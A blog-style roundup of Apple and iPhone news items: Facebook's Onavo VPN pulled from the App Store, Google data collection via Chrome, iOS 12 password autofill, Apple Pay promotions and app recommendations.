  • VPN software is used to keep your Internet use private, especially if you are using public Wi-Fi.  But according to Chance Miller of 9to5Mac, Apple has asked Facebook to remove its Onavo VPN app from the App Store.  While that app may keep your Internet use private from other people on the same network, apparently Facebook tracks everything that you do while using the app, making it a privacy nightmare.  Kudos to Apple for continuing to make privacy a priority.
  • Speaking of privacy, John Gruber of Daring Fireball links to a Digital Content Next story about a report from Vanderbilt Professor Douglas Schmidt which finds that while Google doesn't collect any of your personal data from the Safari web browser when you are not actively using it, a dormant Android phone running the Chrome browser sends information to Google 340 times in a 24-hour period.
  • Gruber also discusses the shake-to-undo feature of the iPhone, and notes that many people don't even know that the feature is there.  I don't use it often, but when I do, I'm glad it there.  Hopefully, you already know that it is there, but if not, you do now.
  • Zac Hall of 9to5Mac recommends HomeKit devices that you can use to monitor the temperature at your house.
  • Peter Cao of 9to5Mac shows off how 1Password is integrated into the operating system in iOS 12.  Juli Clover of MacRumors also wrote a good explanation with lots of pictures.  This feature looks fantastic.
  • Roger Fingas of AppleInsider reports that, from today through August 31, Apple will donate $1 to the National Park Foundation for every Apple Pay purchase made at an Apple store or on the Apple website.  And on September 1, there will be a special Activity Challenge on the Apple Watch.
  • Steven Musil of CNet reports that you can now use Apple Pay when you shop at Costco.
  • Ian Fuchs of Cult of Mac says that the free Highball app is an essential iOS app.  I agree; it is what I use to store all of my cocktail recipes. 
  • And finally, here is an ad for Face ID on the iPhone X that Apple debuted a few weeks ago which features a game show theme.  It is called Memory:

Categories: iPhone Web Sites

Pages

Subscribe to www.hdgonline.net aggregator